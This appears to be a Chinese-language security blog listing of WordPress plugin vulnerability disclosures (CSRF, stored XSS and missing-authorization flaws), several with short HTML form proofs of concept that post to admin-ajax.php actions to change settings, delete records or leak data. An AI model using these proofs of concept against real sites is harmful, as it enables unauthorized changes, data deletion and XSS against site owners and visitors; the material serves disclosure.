由于没有对一些特殊字符过滤,便可以添加闭合字符,从而导致XXS漏洞 POC如下: Dashboard—->Users—->My Role—>Create new user—->fill the Role Name with “> and then click the “add user”
Month: August 2022
access-code-feeder < 1.0.3 subscriber权限下CSRF导致的插件更新
POC如下: < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=base_url_action" method="POST" enctype="multipart/form-data"> < input type="hidden" name="new_url" value="http://www.google.com"> < input type="submit" name="Submit"> < /form> < /body> < /html> 漏洞详情:https://patchstack.com/database/vulnerability/access-code-feeder/wordpress-access-code-feeder-plugin-1-0-3-cross-site-request-forgery-csrf-vulnerability
about-me < = 1.0.12 subscriber权限下 CSRF导致插件配置更新
POC如下 < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=social_links_delete_network" method="POST" enctype="multipart/form-data"> < input type="hidden" name="linkId" value="1"> < input type="submit" name="Submit"> < /form> < /body> < /html> 执行完会导致直接删除了ID为1的社交网络帐号
about-rentals < = 1.5 任意用户未经授权的函数调用导致配置更新
由于没有对AJAX异常函数调用进行NONCE的验证和角色权限的判断,从而导致了任意用户未经授权的函数调用导致配置更新 POC如下: < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=abr_update_search_settings" method="POST" enctype="multipart/form-data"> < input type="hidden" name="value" value="200"> < input type="submit" name="Submit"> < /form> < /body> < /html> 从而导致修改了插件的配置
accommodation-system < = 1.0.1 subscriber权限下CSRF漏洞导致敏感信息泄露
由于没有对AJAX进行NONCE和权限的判断,从而导致CSRF漏洞 POC如下: < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=has_task" method="POST" enctype="multipart/form-data"> < input type="hidden" name="task_name" value="room-floor"> < input type="submit" name="Submit"> < /form> < /body> < /html> 导致了一些内部信息的泄露
SEO Scout plugin <= 0.9.83 未经验证的函数调用导致配置修改
由于没有对AJAX异常调用的时候进行nonce验证和当前角色权限的判断,从而导致了CSRF漏洞 漏洞详情—>https://patchstack.com/database/vulnerability/ab-rankings-testing-tool/wordpress-seo-scout-plugin-0-9-83-cross-site-request-forgery-csrf-vulnerability
Multivendor Marketplace Solution for WooCommerce < 3.8.12 - 未经授权的函数调用
这个插件很多地方的AJAX调用函数都没有对当前用户权限进行判断,导致可以任意操作一些危险的AJAX动作,比如暂停插件用户,随意更改订单状态等等 关于此漏洞更加详细的信息请查看这里:https://wpscan.com/vulnerability/c600dd04-f6aa-430b-aefb-c4c6d554c41a
WordPress Notification Bar for WordPress plugin <= 1.1.8 - 未经认证用户的存储型XSS漏洞攻击
由于缺少CSRF的检测,导致任何用户可以修改插件配置,把危险代码存储进数据库,从而导致进一步的XSS攻击 POC如下: < html> < body> < form action="http://exsample.com/wp-admin/admin-ajax.php?action=ajax_subscribe" method="POST" enctype="multipart/form-data"> < input type="hidden" name="email" value="e[email protected]“> < input type="submit" name="Submit"> < /form> < /body> < /html> 一旦管理员访问了后台该插件配置,立刻触发了XSS攻击代码
WordPress Alpine PhotoTile for Pinterest plugin <= 1.3.1 - 认证用户可进行XSS漏洞攻击
由于缺少特殊字符的过滤,认证用户在插件配置中可以进行XSS攻击 具体信息已经由patchstack披露: https://patchstack.com/database/vulnerability/alpine-photo-tile-for-pinterest/wordpress-alpine-phototile-for-pinterest-plugin-1-3-1-authenticated-stored-cross-site-scripting-xss-vulnerability
WordPress THE Leads Management System: 59sec LITE plugin <= 3.4.1 未经认证用户随意更改插件配置
由于缺少对AJAX的授权认证,导致未经认证用户随意更改插件配置,比如保存插件的tokens设置, 以下为POC < html> < body> < form action=”http://exsample.com/wp-admin/admin-ajax.php?action=59sec_save_tokens” method=”POST” enctype=”multipart/form-data”> < input type=”hidden” name=”device_token” value=”anyvalue”> < input type=”submit” name=”Submit”> < /form> < /body> < /html>